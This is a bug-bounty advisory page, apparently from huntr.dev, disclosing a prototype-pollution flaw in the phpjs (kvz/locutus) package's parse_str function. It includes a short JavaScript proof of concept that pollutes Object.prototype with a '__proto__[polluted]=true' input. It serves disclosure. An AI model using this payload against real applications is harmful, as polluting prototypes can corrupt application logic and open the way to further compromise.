Lucene search

K
huntrD3m0n-r00t1-NPM-PHPJS
HistoryAug 20, 2020 - 12:00 a.m.

Prototype Pollution in kvz/locutus

2020-08-2000:00:00
d3m0n-r00t
www.huntr.dev
11
phpjs
javascript
library
vulnerable
parse_str
bugbounty

EPSS

0.007

Percentile

79.8%

Description

phpjs is a community built PHP binding in JavaScript.
This package is vulnerable to Prototype Pollution via parse_str.

Proof of Concept

const phpjs = require('phpjs');
phpjs.parse_str("__proto__[polluted]=true",{}); 
console.log(polluted);

EPSS

0.007

Percentile

79.8%